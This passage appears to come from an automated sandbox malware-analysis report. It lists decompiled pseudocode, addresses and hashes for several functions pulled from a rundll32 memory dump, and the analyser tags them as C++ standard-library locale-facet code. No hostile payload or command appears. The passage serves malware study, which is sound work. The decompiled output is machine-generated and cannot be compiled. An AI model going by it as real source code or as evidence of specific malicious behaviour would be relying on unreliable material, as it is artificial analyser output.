				 *((long long*)( *((intOrPtr*)( *_t80 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t55, _t80),  &_a16);
			}





















                0x215205d8ba4
                0x215205d8bac
                0x215205d8bb5
                0x215205d8bba
                0x215205d8bc4
                0x215205d8bca
                0x215205d8bd1
                0x215205d8bd6
                0x215205d8be0
                0x215205d8be9
                0x215205d8bee
                0x215205d8bf5
                0x215205d8bf7
                0x215205d8bff
                0x215205d8c07
                0x215205d8c13
                0x215205d8c18
                0x215205d8c1f
                0x215205d8c27
                0x215205d8c29
                0x215205d8c31
                0x215205d8c38
                0x215205d8c42
                0x215205d8c44
                0x215205d8c4d
                0x215205d8c4f
                0x215205d8c57
                0x215205d8c5e
                0x215205d8c63
                0x215205d8c68
                0x215205d8c72
                0x215205d8c7b
                0x215205d8c82
                0x215205d8c93
                0x215205d8c98
                0x215205d8c99
                0x215205d8c9e
                0x215205d8caf
                0x215205d8cb7
                0x215205d8cdb

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowcollate
                • String ID:
                • API String ID: 1144514573-0
                • Opcode ID: 3d03665402543a626942d37dbf75a1454e9bb7ffc27db6286ccf80dc58e6ee34
                • Instruction ID: 33ced1da6e0efdf318c7dd462a93a924d058852f29f263090e7f2e74cbf3f199
                • Opcode Fuzzy Hash: 3d03665402543a626942d37dbf75a1454e9bb7ffc27db6286ccf80dc58e6ee34
                • Instruction Fuzzy Hash: 28313C37317E24C1EA219B25E5582E96365EBE4BE0F1802939E5D4BBFDDE38D8478700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205EEC4C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000215215205EEC4C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681cd8; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681c98; // 0x0
				if (_t56 != 0) goto 0x205eecc7;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681c98 - _t56; // 0x0
				if (_t43 != 0) goto 0x205eecb6;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681c98 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681c98; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205eecdb;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205eecdd;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205eed6a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205eed03;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205eed01;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205eed03;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205eed6a;
				if (_t79 == 0) goto 0x205eed12;
				goto 0x205eed6a;
				E00000215215205EF5A0(0, 0, _t57,  &_a24, _t80);
				if (_t53 != 0xffffffff) goto 0x205eed41;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681cd8 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}


















                0x215205eec4c
                0x215205eec54
                0x215205eec5d
                0x215205eec62
                0x215205eec6c
                0x215205eec72
                0x215205eec79
                0x215205eec7e
                0x215205eec88
                0x215205eec91
                0x215205eec96
                0x215205eec9d
                0x215205eec9f
                0x215205eeca7
                0x215205eecaf
                0x215205eecbb
                0x215205eecc0
                0x215205eecc7
                0x215205eeccf
                0x215205eecd1
                0x215205eecd9
                0x215205eece0
                0x215205eecea
                0x215205eecec
                0x215205eecf5
                0x215205eecf7
                0x215205eecff
                0x215205eed06
                0x215205eed0b
                0x215205eed10
                0x215205eed1a
                0x215205eed23
                0x215205eed2a
                0x215205eed3b
                0x215205eed40
                0x215205eed41
                0x215205eed46
                0x215205eed57
                0x215205eed5f
                0x215205eed83

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: b7eb96f6c65164070f922ad073de2a418dd0f5d755e3369380727ea95ee686a8
                • Instruction ID: 9ffebcb842f689651241a5ad9474e56037d7446f8bbbfaf9d9d2fa66cad4c3f5
                • Opcode Fuzzy Hash: b7eb96f6c65164070f922ad073de2a418dd0f5d755e3369380727ea95ee686a8
                • Instruction Fuzzy Hash: 63317033356E24C1EB219B16E9582E96365EBE47E4F680292DE9D077EDDE38D8428700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D8CDC Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D8CDC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t42;
				void* _t43;
				void* _t45;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				signed long long _t59;
				intOrPtr _t66;
				intOrPtr* _t80;
				long long _t81;
				void* _t82;
				void* _t83;

				_t53 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t82 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t81 =  *0x20681bd0; // 0x0
				_a24 = _t81;
				_t58 =  *0x20681b20; // 0x0
				if (_t58 != 0) goto 0x205d8d57;
				E00000215215205D19DC(0,  &_a8);
				_t45 =  *0x20681b20 - _t58; // 0x0
				if (_t45 != 0) goto 0x205d8d46;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b20 = _t53;
				_t29 = E00000215215205D1A5C(_t53,  &_a8);
				_t59 =  *0x20681b20; // 0x0
				_t66 = _a8;
				if (_t59 -  *((intOrPtr*)(_t66 + 0x18)) >= 0) goto 0x205d8d6b;
				_t54 =  *((intOrPtr*)(_t66 + 0x10));
				goto 0x205d8d6d;
				if ( *((intOrPtr*)(_t54 + _t59 * 8)) != 0) goto 0x205d8dfa;
				if ( *((intOrPtr*)(_t66 + 0x24)) == dil) goto 0x205d8d93;
				E00000215215205D6CC0(_t29);
				if (_t59 -  *((intOrPtr*)(_t54 + 0x18)) >= 0) goto 0x205d8d91;
				_t55 =  *((intOrPtr*)(_t54 + 0x10));
				goto 0x205d8d93;
				if ( *((intOrPtr*)(_t55 + _t59 * 8)) != 0) goto 0x205d8dfa;
				if (_t81 == 0) goto 0x205d8da2;
				goto 0x205d8dfa;
				E00000215215205DBC40(0, _t42, _t43, _t59,  &_a24, _t82, _t83);
				if (_t55 != 0xffffffff) goto 0x205d8dd1;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t59,  &_v48, 0x2066bb90, _t81);
				asm("int3");
				_t80 = _a24;
				 *0x20681bd0 = _t80;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t80 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t55, _t80),  &_a16);
			}





















                0x215205d8cdc
                0x215205d8ce4
                0x215205d8ced
                0x215205d8cf2
                0x215205d8cfc
                0x215205d8d02
                0x215205d8d09
                0x215205d8d0e
                0x215205d8d18
                0x215205d8d21
                0x215205d8d26
                0x215205d8d2d
                0x215205d8d2f
                0x215205d8d37
                0x215205d8d3f
                0x215205d8d4b
                0x215205d8d50
                0x215205d8d57
                0x215205d8d5f
                0x215205d8d61
                0x215205d8d69
                0x215205d8d70
                0x215205d8d7a
                0x215205d8d7c
                0x215205d8d85
                0x215205d8d87
                0x215205d8d8f
                0x215205d8d96
                0x215205d8d9b
                0x215205d8da0
                0x215205d8daa
                0x215205d8db3
                0x215205d8dba
                0x215205d8dcb
                0x215205d8dd0
                0x215205d8dd1
                0x215205d8dd6
                0x215205d8de7
                0x215205d8def
                0x215205d8e13

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowcollate
                • String ID:
                • API String ID: 1144514573-0
                • Opcode ID: 7664db7a8260f0a43f4f5b3d2543e00a334a7409cc2449b6c80fd0beb6521428
                • Instruction ID: 11d8330e8c599f63c0e5b6c4b6bf22ccce10b13c5ea7fa0e005713c49ebe53c1
                • Opcode Fuzzy Hash: 7664db7a8260f0a43f4f5b3d2543e00a334a7409cc2449b6c80fd0beb6521428
                • Instruction Fuzzy Hash: B0312E37306E64C1EA25AB15E5582E96365EBF4BE0F180293DE6D07BEDDB38D4478700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D8E14 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 60%
                			E00000215215205D8E14(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;
				void* _t81;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c10; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681938; // 0x0
				if (_t56 != 0) goto 0x205d8e8f;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681938 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d8e7e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681938 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681938; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d8ea3;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d8ea5;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d8f32;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d8ecb;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d8ec9;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d8ecb;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d8f32;
				if (_t79 == 0) goto 0x205d8eda;
				goto 0x205d8f32;
				E00000215215205DBD60(0, 0, _t57,  &_a24, _t80, _t79, _t80, _t81);
				if (_t53 != 0xffffffff) goto 0x205d8f09;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c10 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}




















                0x215205d8e14
                0x215205d8e1c
                0x215205d8e25
                0x215205d8e2a
                0x215205d8e34
                0x215205d8e3a
                0x215205d8e41
                0x215205d8e46
                0x215205d8e50
                0x215205d8e59
                0x215205d8e5e
                0x215205d8e65
                0x215205d8e67
                0x215205d8e6f
                0x215205d8e77
                0x215205d8e83
                0x215205d8e88
                0x215205d8e8f
                0x215205d8e97
                0x215205d8e99
                0x215205d8ea1
                0x215205d8ea8
                0x215205d8eb2
                0x215205d8eb4
                0x215205d8ebd
                0x215205d8ebf
                0x215205d8ec7
                0x215205d8ece
                0x215205d8ed3
                0x215205d8ed8
                0x215205d8ee2
                0x215205d8eeb
                0x215205d8ef2
                0x215205d8f03
                0x215205d8f08
                0x215205d8f09
                0x215205d8f0e
                0x215205d8f1f
                0x215205d8f27
                0x215205d8f4b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowctype
                • String ID:
                • API String ID: 3748636215-0
                • Opcode ID: 8b9c68511d25b6fecb829fe2f47a64f8a16cd5e3d06e9751f2536ea882d89b5e
                • Instruction ID: 4f486ac5eb9b0f2c90bf17d08595a3b73eef32c5b804ae89fefaaba0f3de29b6
                • Opcode Fuzzy Hash: 8b9c68511d25b6fecb829fe2f47a64f8a16cd5e3d06e9751f2536ea882d89b5e
                • Instruction Fuzzy Hash: 65314F33307E24C1EB219B15E9582E96365EBE4BE0F190292DE5D47BEDDE38D4478700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D8F4C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 60%
                			E00000215215205D8F4C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;
				void* _t81;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681bb0; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681920; // 0x0
				if (_t56 != 0) goto 0x205d8fc7;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681920 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d8fb6;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681920 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681920; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d8fdb;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d8fdd;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d906a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9003;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9001;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d9003;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d906a;
				if (_t79 == 0) goto 0x205d9012;
				goto 0x205d906a;
				E00000215215205DBE70(0, 0, _t57,  &_a24, _t80, _t79, _t80, _t81);
				if (_t53 != 0xffffffff) goto 0x205d9041;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681bb0 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}




















                0x215205d8f4c
                0x215205d8f54
                0x215205d8f5d
                0x215205d8f62
                0x215205d8f6c
                0x215205d8f72
                0x215205d8f79
                0x215205d8f7e
                0x215205d8f88
                0x215205d8f91
                0x215205d8f96
                0x215205d8f9d
                0x215205d8f9f
                0x215205d8fa7
                0x215205d8faf
                0x215205d8fbb
                0x215205d8fc0
                0x215205d8fc7
                0x215205d8fcf
                0x215205d8fd1
                0x215205d8fd9
                0x215205d8fe0
                0x215205d8fea
                0x215205d8fec
                0x215205d8ff5
                0x215205d8ff7
                0x215205d8fff
                0x215205d9006
                0x215205d900b
                0x215205d9010
                0x215205d901a
                0x215205d9023
                0x215205d902a
                0x215205d903b
                0x215205d9040
                0x215205d9041
                0x215205d9046
                0x215205d9057
                0x215205d905f
                0x215205d9083

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowctype
                • String ID:
                • API String ID: 3748636215-0
                • Opcode ID: 27dbf01f50d32c22c3e583ab8237cec28e54682c73bc6787fa8cbc7baa7da1a1
                • Instruction ID: ce5794b231985a1a197d4df5394c526cab2ef0834fb68996c5cf50d47cc54ee7
                • Opcode Fuzzy Hash: 27dbf01f50d32c22c3e583ab8237cec28e54682c73bc6787fa8cbc7baa7da1a1
                • Instruction Fuzzy Hash: 09313D37306E64C1EA219B15E9582E96365EBE4BE0F184292EE6D47BEDDF38D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D9084 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D9084(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c38; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b78; // 0x0
				if (_t56 != 0) goto 0x205d90ff;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b78 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d90ee;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b78 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b78; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9113;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d9115;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d91a2;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d913b;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9139;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d913b;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d91a2;
				if (_t79 == 0) goto 0x205d914a;
				goto 0x205d91a2;
				E00000215215205DBF80(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205d9179;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c38 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d9084
                0x215205d908c
                0x215205d9095
                0x215205d909a
                0x215205d90a4
                0x215205d90aa
                0x215205d90b1
                0x215205d90b6
                0x215205d90c0
                0x215205d90c9
                0x215205d90ce
                0x215205d90d5
                0x215205d90d7
                0x215205d90df
                0x215205d90e7
                0x215205d90f3
                0x215205d90f8
                0x215205d90ff
                0x215205d9107
                0x215205d9109
                0x215205d9111
                0x215205d9118
                0x215205d9122
                0x215205d9124
                0x215205d912d
                0x215205d912f
                0x215205d9137
                0x215205d913e
                0x215205d9143
                0x215205d9148
                0x215205d9152
                0x215205d915b
                0x215205d9162
                0x215205d9173
                0x215205d9178
                0x215205d9179
                0x215205d917e
                0x215205d918f
                0x215205d9197
                0x215205d91bb

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 2159c5b4dac8b035652903f0369b496db8fdee2f66dfb148fbec41badafb11c6
                • Instruction ID: 2d0eb93bcd7379f75b426a556e52179c43d3a16df037b96973795b1664665f4b
                • Opcode Fuzzy Hash: 2159c5b4dac8b035652903f0369b496db8fdee2f66dfb148fbec41badafb11c6
                • Instruction Fuzzy Hash: D5314A37706E24C1FB219B26E9582E96365EBE4BE0F2802939E5D076EDDE34D847C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D91BC Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D91BC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681bd8; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b28; // 0x0
				if (_t56 != 0) goto 0x205d9237;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b28 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d9226;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b28 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b28; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d924b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d924d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d92da;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9273;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9271;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d9273;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d92da;
				if (_t79 == 0) goto 0x205d9282;
				goto 0x205d92da;
				E00000215215205DC044(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205d92b1;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681bd8 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d91bc
                0x215205d91c4
                0x215205d91cd
                0x215205d91d2
                0x215205d91dc
                0x215205d91e2
                0x215205d91e9
                0x215205d91ee
                0x215205d91f8
                0x215205d9201
                0x215205d9206
                0x215205d920d
                0x215205d920f
                0x215205d9217
                0x215205d921f
                0x215205d922b
                0x215205d9230
                0x215205d9237
                0x215205d923f
                0x215205d9241
                0x215205d9249
                0x215205d9250
                0x215205d925a
                0x215205d925c
                0x215205d9265
                0x215205d9267
                0x215205d926f
                0x215205d9276
                0x215205d927b
                0x215205d9280
                0x215205d928a
                0x215205d9293
                0x215205d929a
                0x215205d92ab
                0x215205d92b0
                0x215205d92b1
                0x215205d92b6
                0x215205d92c7
                0x215205d92cf
                0x215205d92f3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: a678ebd587474b6492c7179f4ab23335cff09dd40e9fad8dbf0461a54e0cd508
                • Instruction ID: 72d2e32c43a074c76b599d29ab48866a1298704826bcfe68d991746f62ad9b80
                • Opcode Fuzzy Hash: a678ebd587474b6492c7179f4ab23335cff09dd40e9fad8dbf0461a54e0cd508
                • Instruction Fuzzy Hash: 9A313D3B306E20D1EB259B15E5582E963A5EBF97E0F280292DE6D07BEDDA34D4478700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D92F4 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D92F4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c40; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b80; // 0x0
				if (_t56 != 0) goto 0x205d936f;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b80 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d935e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b80 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b80; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9383;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d9385;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9412;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d93ab;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d93a9;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d93ab;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9412;
				if (_t79 == 0) goto 0x205d93ba;
				goto 0x205d9412;
				E00000215215205DC108(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205d93e9;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c40 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d92f4
                0x215205d92fc
                0x215205d9305
                0x215205d930a
                0x215205d9314
                0x215205d931a
                0x215205d9321
                0x215205d9326
                0x215205d9330
                0x215205d9339
                0x215205d933e
                0x215205d9345
                0x215205d9347
